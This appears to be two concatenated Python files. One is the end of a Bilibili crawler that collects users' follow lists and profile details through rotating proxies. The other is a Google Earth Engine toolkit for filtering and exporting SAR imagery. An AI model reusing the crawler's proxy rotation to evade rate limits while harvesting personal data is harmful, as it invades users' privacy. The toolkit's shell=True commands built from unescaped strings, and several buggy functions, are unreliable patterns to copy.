total = info_dict.get('total')
focus_list = info_dict.get('list')
user_id = response.url.strip('https://api.bilibili.com/x/relation/followings?vmid=').split('&')[0]
for focus_item in focus_list:
focus_info = dict()
focus_info['total'] = total
focus_info['user_id'] = user_id
focus_info['focus_id'] = focus_item.get('mid')
focus_info['focus_name'] = focus_item.get('uname')
focus_info['focus_face'] = focus_item.get('face')
focus_info['introduction'] = focus_item.get('sign')
# print("test:", focus_info)
# 将 follower id 写入到待抓取队列
r.sadd(redis_set, focus_info.get('focus_id'))
mbd.execute('relation', focus_info)
print(f"进程--{pid}--当前抓取:用户-{user_id}-完成")
def get_proxy(index):
proxy_url = 'http://ip.ipjldl.com/index.php/api/entry?method=proxyServer.hdtiqu_api_url&packid=0&fa=0&groupid=0&fetch_key=&time=100&qty=10&port=1&format=json&ss=5&css=&dt=0&pro=&city=&usertype=4'
try:
response = requests.get(proxy_url)
response = response.text
result = json.loads(response)
proxy_list = result.get('data')
proxy_count = len(proxy_list)
num = random.randint(0, proxy_count)
ip = proxy_list[num].get('IP')
port = proxy_list[num].get('Port')
proxy = 'https://{}:{}'.format(ip, port)
return proxy
except Exception as e:
print(f"{index}----当前获取代理失败,正在重新获取代理!!!")
time.sleep(3)
get_proxy(index)
pass
def run(index):
proxy = get_proxy(index)
proxies = {
"http": proxy,
"https": proxy,
}
k = 0
while True:
url = rdb.r.lpop(redis_key)
if url is None:
break
try:
parse(index, url, proxies)
except Exception as e:
k += 1
proxy = get_proxy(index)
proxies = {
"http": proxy,
"https": proxy,
}
print(f"{index}----new_proxy:{proxies}")
parse(index, url, proxies)
print("over")
if __name__ == '__main__':
for i in range(20):
p = Process(target=run, args=(i,))
p.start()
print("主进程ouer!!!")
|
area.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 20 10:48:31 2021
@author: jon-f
"""
import os
import subprocess
import threading
from datetime import date
import glob
import time
import math
from IPython.display import display
import datetime as dt
import pytz
import matplotlib.pyplot as plt
import numpy as np
import folium
import ee
from google.cloud import storage
def auth():
"""
Authenticates the user to Google Earth Engine and initializes the library.
Parameters:
None.
Returns:
client (storage.Client): A Client object that can be used to access \
Google Cloud Storage data.
"""
while True:
try:
for file in os.listdir():
if file == 'service_account.txt':
service_account = open(file).read()
break
if not os.path.exists('service_account.txt'):
service_account = input("Enter your service account email: ")
json_file = ''
for file in os.listdir():
if file.endswith('.json'):
json_file = file
break
if service_account and json_file:
credentials = ee.ServiceAccountCredentials(service_account, json_file)
ee.Initialize(credentials=credentials)
client_obj = storage.Client(credentials=credentials)
break
else:
raise KeyError("The JSON private key file could not be found \
or was inconsistent with the service account. \
Please place only one key in the current file directory.")
break
except KeyboardInterrupt:
raise KeyboardInterrupt('Program stopped by user.')
return client_obj
client = auth()
# reducer
def divider(coordinates):
"""
(For internal use)
Divides coordinates until the area is under 0.01 Lat_long area.
"""
assert np.array(coordinates).shape[1] == 2, "Coordinates of wrong size [error]"
def checkifrect(nparray):
pone, ptwo, pthree, pfour, pfive = nparray
v1_mag = np.linalg.norm(np.subtract(pthree, pone))
v2_mag = np.linalg.norm(np.subtract(pfour, ptwo))
return bool(np.abs(v1_mag-v2_mag) < 0.001)
assert checkifrect(coordinates), "The input geometry must be rectangular"
x_data = coordinates[:, 0]
y_data = coordinates[:, 1]
(c_x, c_y) = (np.sum(x_data[:-1])/np.size(x_data[:-1]),
np.sum(y_data[:-1])/np.size(y_data[:-1]))
new_polygons = []
corners = len(coordinates)-1
for i in range(corners):
polygon = [[x_data[i], y_data[i]],
[(x_data[i%corners]+x_data[(i+1)%corners])/2,
(y_data[i%corners]+y_data[(i+1)%corners])/2],
[c_x, c_y],
[(x_data[i]+x_data[(i-1)%corners])/2,
(y_data[i]+y_data[(i-1)%corners])/2],
[x_data[i], y_data[i]]]
new_polygons.append(polygon)
return new_polygons
def rect_area(coordinates):
"""
(For internal use)
Calculates the area of a rectangle using Lat_long area.
"""
try:
np.array(coordinates).shape[1] == 2
p1, p2, p3, p4, p5 = coordinates
except:
coordinates = primer(coordinates)[0]
p1, p2, p3, p4, p5 = coordinates
area = np.abs(np.linalg.norm(p2-p1)*np.linalg.norm(p4-p1))
return area
def primer(area):
l1 = [area,]
l2 = np.array(l1)
l3 = np.reshape(l2,(l2.shape[0], l2.shape[2], 2))
return l3
def reduce(listOfCoords):
"""
Divides a rectangles defined by closed coordinates into smaller, rectangles.
Parameters:
listOfCoords (list): A list of coordinates in the form \
[[[x1, y1], [x2, y2], ..., [x1, y1]], ...]. The \
coordinates must define a rectangular shape.
Returns:
new_polygons (list): A set of new rectangular in the form \
[coordinates1, coordinates2, ..., coordinatesn] where n is \
the number number of length of coordinates-1 (the number of corners)
"""
def all_good(listOfCoords):
flag = True
for coords in listOfCoords:
if rect_area(coords) > 0.1: # arbitary value
flag = False
break
return flag
try:
listOfCoords[1]
except:
listOfCoords = primer(listOfCoords)
assert listOfCoords.shape[2] == 2, "wrong size error"
if all_good(listOfCoords):
return listOfCoords
newlistOfCoords = []
for coords in listOfCoords:
newlistOfCoords = newlistOfCoords + divider(coords)
newlistOfCoords = np.squeeze(np.array(newlistOfCoords))
return reduce(listOfCoords=newlistOfCoords)
def geoJSONer(coords):
try:
coords = coords.tolist()
except:
pass
geoJSON = {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"properties": {},
"geometry": {
"type": "Polygon",
"coordinates": [
coords
]
}
}
]
}
return geoJSON
def degeoJSONer(geoJSON):
coords = geoJSON['features'][0]['geometry']['coordinates']
return coords
# filters
def lowpass1(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
system_index = system_index.replace('/', '__')
row = [1/9, 1/9, 1/9]
kernel = ee.Kernel.fixed(width=3, height=3, weights=[row, row, row])
n_image = image.convolve(kernel)
return n_image.set('system:index', system_index)
def lowpass2(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
system_index = system_index.replace('/', '__')
rowA = [0, 1/8, 0]
rowB = [1/8, 1/2, 1/8]
kernel = ee.Kernel.fixed(width=3, height=3, weights=[rowA, rowB, rowA])
n_image = image.convolve(kernel)
return n_image.set('system:index', system_index)
def highpass1(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
system_index = system_index.replace('/', '__')
rowA = [-1/8, 1/8, -1/8]
rowB = [1/8, 0, 1/8]
kernel = ee.Kernel.fixed(width=3, height=3, weights=[rowA, rowB, rowA])
n_image = image.convolve(kernel)
return n_image.set('system:index', system_index)
def highpass2(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
system_index = system_index.replace('/', '__')
rowA = [0, -1/4, 0]
rowB = [-1/4, 1, -1/4]
kernel = ee.Kernel.fixed(width=3, height=3, weights=[rowA, rowB, rowA])
n_image = image.convolve(kernel)
return n_image.set('system:index', system_index)
def frost(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__')
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
nfrost = 7 # kernel size
D = 2 # frost damping factor
kernel = np.zeros((nfrost, nfrost))
center = (nfrost-1)/2
for i in range(nfrost):
for j in range(nfrost):
kernel[i, j] = ((center-i)**2 + (center-j)**2)**(1/2)
distArr = ee.Array(kernel.tolist())
distArrImg = ee.Image(distArr)
weights = ee.List.repeat(ee.List.repeat(1,nfrost),nfrost)
kernel = ee.Kernel.fixed(nfrost,nfrost, weights, center, center)
mean = image.select(bandNames).reduceNeighborhood(ee.Reducer.mean(), kernel);
var = image.select(bandNames).reduceNeighborhood(ee.Reducer.variance(), kernel);
B = var.divide(mean.multiply(mean)).multiply(D)
eNegB = B.multiply(-1).exp()
Bneighbor = eNegB.neighborhoodToArray(kernel)
W = Bneighbor.pow(distArrImg)
WSum = W.arrayReduce(ee.Reducer.sum(), [0,1]).arrayFlatten([['coefficientx'], ['coeffecienty']])
imageNeighbor = image.select(bandNames).neighborhoodToArray(kernel)
imageNeighborW = imageNeighbor.multiply(W)
n_image = imageNeighborW.arrayReduce(ee.Reducer.sum(), [0, 1]).arrayFlatten([['frostx'], ['frosty']]).divide(WSum)
return n_image.rename(bandNames).set('system:index', system_index)
def gammamap(image):
"""
Gamma Maximum a-posterior Filter applied to one image. It is implemented as \
described in Lopes A., Nezry, E., Touzi, R., and Laur, H., 1990. \
Maximum A Posteriori Speckle Filtering and First Order texture Models \
in SAR Images. International Geoscience and Remote Sensing Symposium.
Parameters
----------
image : ee.Image
Image to be filtered
Returns
-------
ee.Image
Filtered Image
"""
enl = 5
KERNEL_SIZE=5
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames= image.bandNames()
#local mean
reducers = ee.Reducer.mean().combine( \
reducer2= ee.Reducer.stdDev(), \
sharedInputs= True
)
stats = (image.select(bandNames).reduceNeighborhood( \
reducer= reducers, \
kernel= ee.Kernel.square(KERNEL_SIZE/2,'pixels'), \
optimization= 'window'))
meanBand = bandNames.map(lambda bandName: ee.String(bandName).cat('_mean'))
stdDevBand = bandNames.map(lambda bandName: ee.String(bandName).cat('_stdDev'))
z = stats.select(meanBand)
sigz = stats.select(stdDevBand)
#local observed coefficient of variation
ci = sigz.divide(z)
#noise coefficient of variation (or noise sigma)
cu = 1.0/math.sqrt(enl)
#threshold for the observed coefficient of variation
cmax = math.sqrt(2.0) * cu
cu = ee.Image.constant(cu)
cmax = ee.Image.constant(cmax)
enlImg = ee.Image.constant(enl)
oneImg = ee.Image.constant(1)
twoImg = ee.Image.constant(2)
alpha = oneImg.add(cu.pow(2)).divide(ci.pow(2).subtract(cu.pow(2)))
#Implements the Gamma MAP filter described in equation 11 in Lopez et al. 1990
q = image.select(bandNames).expression(
'z**2 * (z * alpha - enl - 1)**2 + 4 * alpha * enl * b() * z',
{ 'z': z, 'alpha':alpha,'enl': enl})
rHat = z.multiply(alpha.subtract(enlImg).subtract(oneImg))\
.add(q.sqrt()).divide(twoImg.multiply(alpha))
#if ci <= cu then its a homogenous region ->> boxcar filter
zHat = (z.updateMask(ci.lte(cu))).rename(bandNames)
#if cmax > ci > cu then its a textured medium ->> apply Gamma MAP filter
rHat = (rHat.updateMask(ci.gt(cu)).updateMask(ci.lt(cmax))).rename(bandNames)
#ci>cmax then its strong signal ->> retain
x = image.select(bandNames).updateMask(ci.gte(cmax)).rename(bandNames)
#Merge
output = ee.ImageCollection([zHat,rHat,x]).sum()
redone = image.addBands(output, None, True)
return redone
# downlaod functions
def merger(directory='export'):
"""
Run this function after the download is complete to have gdal attempt \
to merge the geoTIFFs. Generally should not used on it's own.
Parameters:
directory (str): The directory to find the unmerged TIF images in. Defaults to 'export'
Returns:
None.
"""
tiles = glob.glob((directory+'/*.tif'))
tiles = " ".join(tiles)
name = directory + "/" + tiles[tiles.find('/')+1:tiles.find('.tif')-2] + ".tif"
print(name)
os.system('!gdal_merge.py -o $name $tiles')
if os.path.isfile(name):
for file in os.scandir(directory):
if file.path.endswith('.tif') and file.path.count('_')==9:
print(file.path, 'has been deleted!')
os.remove(file.path)
else:
assert True, "gdal_merge was not found, \
try restarting the kernel and running merger(directory)"
def batchExport(images, scale, coords, cloud_bucket='',
directory='', to_disk=True, tryReduce=False):
"""
Creates a number of ee.batch tasks equal to the number of ee.Image objects in images. \
The images are downloaded to the Google Cloud Platform Storage glaciers_ee \
bin in the subdirectory set, and also to the disk if to_disk is True.
Parameters:
images (list): a list of images to export to cloudstorage
scale (int): the scale in meters/pixel to download the images at
cloud_bucket (str): The cloud bucket to temporarily upload the images to
directory (str): the subdirectory to download the images to in the \
glaciers_ee bin. Defaults to 'export'
to_disk (bool): If set to True, the images will proceed to download to \
disk. Defaults to True
tryReduce (bool): If set to True, if the images fail for any reason, \
the reduction algorithm will attempt to split the image into smaller segments
Returns:
None.
"""
images_sort = images[:]
def start_tasks(images, scale, cloud_bucket, directory):
for img in images:
try:
system_index = img.get('system:index').getInfo()
system_index + ''
except:
system_index = img.get('system:id').getInfo()
task = ee.batch.Export.image.toCloudStorage(**{
'image': img,
'fileNamePrefix': directory + '/' + system_index,
'region': ee.Geometry.Polygon(coords),
'scale': scale,
'crs': 'EPSG:3031',
'bucket': cloud_bucket,
'fileFormat': 'GeoTIFF',
'maxPixels': 10e12
})
print(system_index, "is being uploaded.")
task.start()
tasks.append(task)
active_ind.append(task.active())
def time_for_completion(active_ind, scale, rate=1.5):
num_imgs = active_ind.count(True)
try:
time_left = (num_imgs * rect_area(coords)/scale * 1/rate)**(3/4) # hours
except:
time_left = (num_imgs * 1/scale * 1/rate)
if time_left < 1/60:
time_left *= 3600
units = 'seconds'
elif time_left < 1.0:
time_left *= 60
units = 'minutes'
else:
units = 'hours'
completion_string = 'The approximate completion time is: {:.1f} {}.'\
.format(time_left, units)
return completion_string
def reduced_upload(failed_task, scale, cloud_bucket, directory):
failed_i = tasks.index(failed_task)
failed_image = images_sort[failed_i]
image_coordinates = failed_image.get('system:footprint').getInfo()['coordinates']
image_segmented = reduce(image_coordinates)
n = 0
for coords in image_segmented.tolist():
name = failed_image.get('system:index').getInfo()
try:
name + ''
except:
name = failed_image.get('system:id').getInfo().replace("/", "")
name_n = name + '_' + str(n)
new_aoi = ee.Geometry.Polygon([coords])
task = ee.batch.Export.image.toCloudStorage(**{
'image': failed_image,
'region': new_aoi,
'fileNamePrefix': directory + '/' + name_n,
'scale': scale,
'crs': 'EPSG:3031',
'bucket': cloud_bucket,
'fileFormat': 'GeoTIFF',
'maxPixels': 10e12
})
task.start()
tasks.append(task)
active_ind.append(task.active())
images_sort.append(failed_image.clip(new_aoi))
n += 1
tasks.pop(failed_i)
active_ind.pop(failed_i)
images_sort.pop(failed_i)
def status_check(tasks):
tasks_copy = tasks[:]
for task in tasks_copy:
if task.status()['state'].lower() == "failed" and tryReduce:
print('Task #{} has failed.'.format(task.id),
'Trying geometrically reduced uploads.')
reduced_upload(task, scale, cloud_bucket, directory)
elif task.status()['state'].lower() == "failed":
active_ind[tasks.index(task)] = False
print('The upload has failed, most likely due to the GEE',
'10e12 pixel limitation. Try a smaller sized geoJSON or tryReduce.',
'The cloud_bucket set should also be checked to see it exists.')
elif task.status()['state'].lower() == "completed":
active_ind[tasks.index(task)] = False
else:
print('{} is {}'.format('Task #' + task.id,
task.status()['state'].lower()))
tasks = []
active_ind = []
STARTED_TASKS = False
start_time = dt.datetime.now(pytz.utc)
exception_flag = False
while True:
try:
if not STARTED_TASKS:
start_tasks(images, scale, cloud_bucket, directory)
STARTED_TASKS = True
print(time_for_completion(active_ind, scale))
print('----------------------------------------------------')
time.sleep(5*active_ind.count(True)**(1/2))
status_check(tasks)
if True not in active_ind:
break
except Exception as e:
exception_flag = True
for task in tasks:
task.cancel()
try:
error_message = ee.data.getTaskStatus(task.id)[0]['error_message']
print(f'Task ID had an error message:/n {error_message}')
except:
print(e)
break
def get_new(start_time):
bucket = client.get_bucket(cloud_bucket)
blobs = client.list_blobs(bucket)
new_blobs = []
for blob in blobs:
dateandtime = blob.updated
if dateandtime > start_time:
new_blobs.append(blob)
return new_blobs
def download_list_of_blobs(list_of_blobs):
def nextfile(blob_name):
def filenamer(i, blob_name):
name = blob_name[:-4] + '_' + str(i) + ".tif"
filename = os.path.join(os.getcwd(), name)
return filename
i = 0
while os.path.isfile(filenamer(i, blob_name)):
i += 1
return filenamer(i, blob_name)
for blob in list_of_blobs:
filename = nextfile(blob_name=blob.name)
try:
with open(filename, 'w'):
pass
blob.download_to_filename(filename)
print('Downloading image as {}'.format(os.path.abspath(filename)))
except FileNotFoundError:
print('ERROR: Directory does not exist on disk!',
'Please create it first.')
if to_disk and not exception_flag:
new = get_new(start_time)
download_list_of_blobs(new)
def cloudtoeecommand(cloud_bucket, directory, assetname, geeusername):
"""
Returns an ee.Image from a cloud storage asset. Requirement:
must have a username and main folder with Google code editor
Parameters:
cloud_bucket (str): string describing the name of the cloud bucket
directory (str): directory describing the directory where the file is stored
assetname (str): the filename of the asset (without .tif)
geeusername (str): your username to store the asset in the code editor
Returns:
eeimage (ee.Image): the ee.Image object of the google cloud asset
"""
if assetname.endswith('.tif'):
assetname = assetname[:-4]
asset_id = 'users/' + geeusername + '/' + assetname
dl_dir = 'gs://' + cloud_bucket + '/' + directory
dl_file = dl_dir + '/' + assetname + '.tif'
command = f'earthengine upload image --asset_id={asset_id} {dl_file}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
result = pop.stdout.read().decode()
taskid = result[result.index(':')+2:result.index('\r')]
while True:
try:
command = f'earthengine task info {taskid}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
status = pop.stdout.read().decode().split(' ')[3]
if 'COMPLETED' in status:
break
elif 'FAILED' in status:
return None
break
print(f'Task #{taskid} is {status.lower().strip()}')
time.sleep(8)
except:
command = f'earthengine task cancel {taskid}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
command = f'earthengine acl set public {asset_id}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
time.sleep(1)
if assetname.startswith('S1'):
def extract_date(assetname):
val = -1
for i in range(4):
val = assetname.find("_", val+1)
datestr = assetname[val+1:assetname.find("_", val+1)]
formatted_date = datestr[:4] + '-' + datestr[4:6] + '-' + datestr[6:11] \
+ ':' + datestr[11:13] + ':' + datestr[13:15]
return formatted_date
command = f'earthengine asset set --time_start {extract_date(assetname)} {asset_id}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
eeimage = ee.Image(asset_id)
print(f'Task #{taskid} is available at {asset_id}')
return eeimage
def multicloudtoee(cloud_bucket, directory, geeusername):
"""
Creates callable image assets from all the Tiffs in a Cloud Directory. \
Requirement: must have a username and main folder with Google code editor
Parameters:
cloud_bucket (str): string describing the name of the cloud bucket
directory (str): directory describing all the images you'd like to upload
geeusername (str): your username to store the asset in the code editor
Returns:
None
"""
bucket = client.get_bucket(cloud_bucket)
blobs = client.list_blobs(bucket)
threads = []
assets = []
for blob in blobs:
ind = str(blob).find('/')
find = ' ' + directory
if str(blob)[ind-1:ind-len(find)-1:-1] != find[::-1]:
# if directory doesn't match, continue to next iter
continue
if str(blob)[ind:str(blob).find(',', ind)].strip() == '/':
# if blob is the actual directory and not a file, continue
continue
blob_info = str(blob).split(' ')
assetname = blob_info[2][blob_info[2].find('/')+1:-1]
if assetname.endswith('.tif'):
assetname = assetname[:-4]
asset_id = 'users/' + geeusername + '/' + assetname
assets.append(asset_id)
def do_convert():
cloudtoeecommand(cloud_bucket, directory, assetname, geeusername)
while True:
alive_count = 0
for thread in threads:
if thread.is_alive(): alive_count += 1
if alive_count < 10:
break
else:
time.sleep(10)
print('Max allowed threads reached. Waiting for threads to free.')
t = threading.Thread(target=do_convert)
t.daemon = True
threads.append(t)
t.start()
for i in range(len(threads)):
threads[i].join()
image_objs_list = [ee.Image(asset) for asset in assets]
return image_objs_list
# folium maps
def add_ee_layer(self, ee_image_object, vis_params, name):
"""
Adds an ee.Image layer to a folium map
Parameters:
ee_image_object (ee.Image): An image to place on folium map
vis_params (dict): Visual parameters to display the image. See GEE "Image Visualization"
name (str): Name of layer on folium map
Returns:
None.
"""
map_id_dict = ee.Image(ee_image_object).getMapId(vis_params)
folium.raster_layers.TileLayer(
tiles = map_id_dict['tile_fetcher'].url_format,
attr = 'Map Data © <a href="https://earthengine.google.com/">Google Earth Engine</a>',
name = name,
overlay = True,
control = True
).add_to(self)
folium.Map.add_ee_layer = add_ee_layer
def eeICtolist(imageCollection):
"""
Converts an ee.ImageCollection to a python list of ee.Image objects.
Parameters:
imageCollection (ee.ImageCollection): the collection to be converted to a list
Returns:
images (list): the list of images in the ee.ImageCollection
"""
size = imageCollection.size()
eeList = imageCollection.toList(size)
aslist = []
for i in range(size.getInfo()):
aslist.append(ee.Image(eeList.get(i)))
return aslist
def dispHist(hists):
"""
Plots 1 histogram for each histogram passed into it.
Parameters:
hists (list): Can either be a histogram from Area.hist() or \
a list of histograms [Area.hist(img1), Area.hist(img2)]
Returns:
None.
"""
assert isinstance(hists, list), "Type of hists should be a list from self.hist, or a list of lists"
a = np.array(hists)
if a.ndim == 3:
# case for hists is a list of histograms
for hist in hists:
a = np.array(hist)
x = a[:, 0]
y = a[:, 1]/np.sum(a[:, 1])
plt.grid()
plt.plot(x, y, '.')
plt.show()
else:
# case for hists is single histogram
x = a[:, 0]
y = a[:, 1]/np.sum(a[:, 1])
plt.grid()
plt.plot(x, y, '.')
plt.show()
def get_dates(images):
"""
Returns the dates of each image in imageCllection
Parameters:
images (ee.Image or ee.ImageCollection): Image/images to get the date of
Returns:
dates (str or list): The dates that the images were taken on
"""
try:
if isinstance(images, ee.ImageCollection):
dates = ee.List(images
.aggregate_array('system:time_start')
.map(lambda time_start:
ee.Date(time_start).format('Y-MM-dd'))).getInfo()
elif isinstance(images, ee.Image):
dates = ee.Date(images.get('system:time_start').getInfo()).format("yyyy-MM-dd").getInfo()
else:
assert True, "Image is not of type ee.Image or ee.ImageCollection"
return dates
except:
print('ERROR: Something went wrong and the Image does \
not have the system:time_start property.')
print('If you need the date, you can manually retrieve \
it from the system:index property')
return None
class Area:
"""
This is the main class. Defined by the geoJSON inputed by the user, \
it contains methods for displaying, operating on, and downloading
ee.Images and ee.ImageCollections.
Parameters"
"--------
geoJSON (dict): The geoJSON defining a singular geographical area. \
See https://geojson.io/.
Methods:
- get_coords()
- get_aoi()
- apply_filters()
- one_per()
- latest_img()
- append_elevation_info()
- normalize_band()
- cluster()
- mapfilter()
- disp()
- download()
- hist()
- get_stats()
- get_CM_stats()
- pypeline()
"""
def __init__(self, geoJSON):
self.geoJSON = geoJSON
self.coords = self.geoJSON['features'][0]['geometry']['coordinates']
self.aoi = ee.Geometry.Polygon(self.get_coords())
def get_coords(self):
"""
Gets the coordinates defined by the geoJSON.
Parameters"
"--------
None.
Returns:
self.coords (list): The coordinates defined by the geoJSON.
"""
return self.coords
def get_aoi(self):
"""
Gets the AOI defined by the coordinates.
Parameters"
"--------
None.
Returns:
self.aoi (list): The AOI defined by the coordinates.
"""
return self.aoi
def apply_filters(self, collection='COPERNICUS/S1_GRD_FLOAT',
start_date=ee.Date(0),
end_date=ee.Date(date.today().isoformat()),
polarization=None, res=None, orbit_node=None,
ins=None, earliest_first=False):
"""
Applies filters to grab an image collecton.
Parameters:
collection (str): Which collection to grab images from
start_date (ee.Date): Start date of filtering
end_date (ee.Date): End date of filtering
polarization (str): Type of polarization to exclusively filter for. \
Defaults to None (any). List of polarization for Sentinel-1 Radar:
- SH: Single HH
- DH: Dual HH/HV
- SV: Single VV
- DV: Dual VV/VH
res (str): L, M, or H. Resolution to filter for. Defaults to None (any)
orbit_node (str): 'ASCENDING' or 'DESCENDING'. Orbit pass. Defaults to None (any)
ins (str): The instrumental mode to filter for. Defaults to None (any)
earliest_first (bool): If set to True, the ee.ImageCollection returned \
will be sorted s.t. the first ee.Image will be the captured the \
earliest. Defaults to False for latest image first.
Returns:
sort (ee.ImageCollection): An image collection with the area of geoJSON
and the specified filters in the args applied.
"""
if isinstance(start_date, (str, int)):
start_date = ee.Date(start_date)
if isinstance(end_date, (str, int)):
end_date = ee.Date(end_date)
aoi = self.get_aoi()
img_set = ee.ImageCollection(collection).filterBounds(aoi).filterDate(start_date, end_date)
if polarization is not None:
polarization_dict = {
'SH': [ee.Filter.listContains('transmitterReceiverPolarisation', 'HH'),
ee.Filter.listContains('transmitterReceiverPolarisation', 'HV').Not()],
'DH': [ee.Filter.listContains('transmitterReceiverPolarisation', 'HH'),
ee.Filter.listContains('transmitterReceiverPolarisation', 'HV')],
'SV': [ee.Filter.listContains('transmitterReceiverPolarisation', 'VV'),
ee.Filter.listContains('transmitterReceiverPolarisation', 'VH').Not()],
'DV': [ee.Filter.listContains('transmitterReceiverPolarisation', 'VV'),
ee.Filter.listContains('transmitterReceiverPolarisation', 'VH'),]}
for filt in polarization_dict[polarization]:
img_set = img_set.filter(filt)
if ins is not None:
img_set = img_set.filter(ee.Filter.eq('instrumentMode', ins))
if res is not None:
img_set = img_set.filter(ee.Filter.eq('resolution', res))
if orbit_node is not None:
img_set = img_set.filter(ee.Filter.eq('orbitProperties_pass', orbit_node))
sort = img_set.sort('system:time_start', opt_ascending=earliest_first)
print(f'This image collection has {sort.size().getInfo()} images.')
return ee.ImageCollection(sort)
def one_per(self, time_range, collection='COPERNICUS/S1_GRD_FLOAT',
start_date=ee.Date(0),
end_date=ee.Date(date.today().isoformat()),
polarization=None, res=None, orbit_node=None, ins=None):
"""
Applies filters to create a LIST with one ee.Image per time_range.
Parameters:
time_range (str): day, month, or year. Specifies the approximate \
time range between photos.
collection (str): Which collection to grab images from
start_date (ee.Date): Start date of filtering
end_date (ee.Date): End date of filtering
polarization (str): Type of polarization to exclusively filter for. \
Defaults to None (any). List of polarization for Sentinel-1 Radar:
- SH: Single HH
- DH: Dual HH/HV
- SV: Single VV
- DV: Dual VV/VH
res (str): L, M, or H. Resolution to filter for. Defaults to None \
for any resolution
orbit_node (str): 'ASCENDING' or 'DESCENDING'. Orbit pass. Defaults to None (any)
ins (str): The instrumental mode to filter for (IW/EW). Defaults to None \
for any instrument mode
Returns:
collected_imgs (ee.ImageCollection): An image collection with the area
of geoJSON and the proper filters applied
"""
def percent_missing(image):
"""
Helper function that returns the % of the image data missing in the first band.
Parameters:
image (ee.Image): The image to calculate the % missing of
Returns:
percentMissing (float): The % missing of the image data compared \
to the self.get_aoi()
"""
missing = ee.Number(image.mask().expression('1-b(0)').reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
totalArea = ee.Number(ee.Image(1).mask().reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
percent_missing = missing.divide(totalArea).getInfo()
return percent_missing
if isinstance(start_date, (str, int)):
start_date = ee.Date(start_date)
if isinstance(end_date, (str, int)):
end_date = ee.Date(end_date)
end_date_time = end_date
current_start_time = start_date
collected_imgs = []
while ee.Algorithms.If(
ee.Number.expression("x > 0", {
'x': end_date_time.difference(current_start_time, 'day')
}), 1, 0).getInfo():
(current_start_time, current_end_time) = (ee.Date(current_start_time)
.getRange(time_range).getInfo()['dates'])
img_col = self.apply_filters(collection=collection,
start_date=current_start_time,
end_date=current_end_time, polarization=polarization,
orbit_node=orbit_node, res=res, ins=ins, earliest_first=True)
try:
as_list = img_col.toList(img_col.size())
best = ee.Image(as_list.get(0)).clip(self.get_aoi())
pm_best = percent_missing(best)
for i in range(as_list.length().getInfo()):
latest = ee.Image(as_list.get(i)).clip(self.get_aoi())
pm_latest = percent_missing(latest)
if pm_latest < 0.01:
best = latest
pm_best = pm_latest
break
elif pm_latest < pm_best:
best = latest
pm_best = pm_latest
collected_imgs.append(best.clip(self.get_aoi()))
print('Selected an image for {}'
.format(ee.Date(current_start_time).format('YYYY-MM-dd').getInfo()))
except:
print('There are no images in the',
time_range, "starting on",
ee.Date(current_start_time).format('YYYY-MM-dd').getInfo())
current_start_time = current_end_time
return ee.ImageCollection(collected_imgs)
def latest_img(self, collection='COPERNICUS/S1_GRD_FLOAT', threshold=80):
"""
Grabs the latest image in the given collection.
Parameters:
collection (str): A collection name from GEE's public collections data. \
Defaults to S1_GRD_FLOAT
Returns:
latest (ee.Image): The latest image for this area
"""
def validity(image, threshold):
def percent_missing(image):
"""
Helper function that returns the % of the image data missing in the first band.
Parameters:
image (ee.Image): The image to calculate the % missing of
Returns:
percentMissing (float): The % missing of the image data compared \
to the self.get_aoi()
"""
missing = ee.Number(image.mask().expression('1-b(0)').reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
totalArea = ee.Number(ee.Image(1).mask().reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
pm = missing.divide(totalArea).getInfo()
return pm
return percent_missing(image)*100 < (100 - threshold)
img_col = self.apply_filters(collection=collection)
eelist = img_col.toList(img_col.size())
for i in range(min(50, img_col.size().getInfo())):
latest = ee.Image(eelist.get(i)).clip(self.get_aoi())
if validity(latest, threshold=threshold):
return latest
break
print('No images within threshold')
return None
def append_elevation_info(self, image):
"""
Adds the elevation information to each image passed into it. \
The image argument must be an ee.Image. Warning: this method \
takes from the mosaic data, so it does not vary with time.
Parameters:
images (ee.Image): Image to add the elevation information. Since \
this is a class function, these are covering the same geographical
area.
Returns:
multi (ee.Image): Image with added elevation as a new band
"""
assert isinstance(image, ee.Image), "Image must be a singular ee.Image object"
elv_collection = 'UMN/PGC/REMA/V1_1/8m'
aoi = self.get_aoi()
elevation = ee.Image(elv_collection).clip(aoi)
multi = ee.Image([image, elevation])
return multi
def normalize_band(self, image, band=0, band_range=None):
"""
Normalizes the band of a given image/images.
Parameters:
image (ee.Image, ee.ImageCollection, list): An image or images \
to normalize
band (int, str): The band of the image to normalize. Either the \
named band or an int representing which band to normalize
band_range (list): If set, will normalize to between these two \
values and clamp all outside to the minimum and maximum.
Returns:
normalized (ee.Image, list): An image or images with the normalize \
band as the new first band. The other bands are untouched
"""
